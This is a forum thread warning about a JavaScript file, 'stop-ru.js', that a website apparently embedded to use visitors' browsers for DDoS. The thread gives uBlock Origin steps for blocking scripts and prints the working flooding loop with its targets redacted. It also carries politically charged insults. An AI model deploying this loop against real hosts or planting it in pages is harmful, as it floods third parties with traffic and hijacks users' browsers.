PSA: JS malware 'stop-ru.js' abuses you for DDoS, tighten your JS grip

arvid

I was reading a seemingly innocent article and kept it in background to finish later, when I noticed the network slowing down. I thought it was just the bad connection as usual, but a day later I sniffed around and found a giant amount of DNS requests. At least it was somewhat mitigated due to aggressive local caching. (Getting blacklisted from the handful of trustworthy resolvers would be painful.) Luckily nothing fancy, but malicious JS on that site. I was afraid it might be some destructive attack like this recent one: https://bb.chip.icu/d/30-open-source-turned-malware-based-on-government-propaganda.

The article turned out to be stolen content too, blatantly ripped for monetization. Greedy western virtue signaling, anyone?
A society corrupted to the core. Can't whine about oil barons when they're such trash themselves, literally ruining it for everyone, just for a few dollars more.

Having JS off is very annoying, but a necessity once more. It's not yet blocked in the popular lists, and seeing how most of tech follows the Zeitgeist for their fragile egos, they might even support it.

If you use uBlock Origin just disable JS globally for now, and deal with the few clicks to enable it on a per-site basis. If anyone randomly reading this doesn't know how, it's easy:

Enable 'I'm an advanced user'.
Click the icon while on any page, and you'll see a new table.
The left column shows the type and hostname, middle is for global rules, right for local.
A red box means blacklisting it, the gray means 'noop' aka bypassing the rule.
Set the scripts to red globally, and gray locally when you need it.

The UI is pretty nice:

Click the lock to save the new rules.
When you encounter a site that needs JS, temporarily bypass and click the refresh button right next to it.
If you need it more often, click the lock too.

Of course, the vast majority of the web requires JS today, this forum currently included. When you research something and visit many sites in succession, you may want to consider a separate temporary browser profile.

If you're interested in the script:

    var targets = [
        'https://127.0.0.1',
    ];

    setInterval(() => {
        targets.map(target => {
            const url = target + '?' + Math.random();
            const controller = new AbortController();
            const timeout = setTimeout(() => controller.abort(), 1000);

            fetch(url, {
                method: 'GET',
                mode: 'no-cors',
                signal: controller.signal
            }).finally(() => clearTimeout(timeout));
        });
    }, 3000);

Targets redacted, of course. Nothing special, but a major pain, and it can get your network blacklisted quickly if you don't notice.

Best of all: It doesn't help anyone, but their egos.

i_loius

So currently no way to block this without killing JS?

arvid

i_loius There is no way to discern scripts* - all the blockers do is go off names. If the Zeitgeist doesn't interfere it'll probably land on the blacklists, but they can just change again.

That's a problem in general, and one reason for all the blacklists being more a 'nice-to-have' against ads, and not too much protection.

*Technically you could intercept individual calls, but you cannot dissect every single script you encounter. Interestingly enough this one wasn't even obfuscated.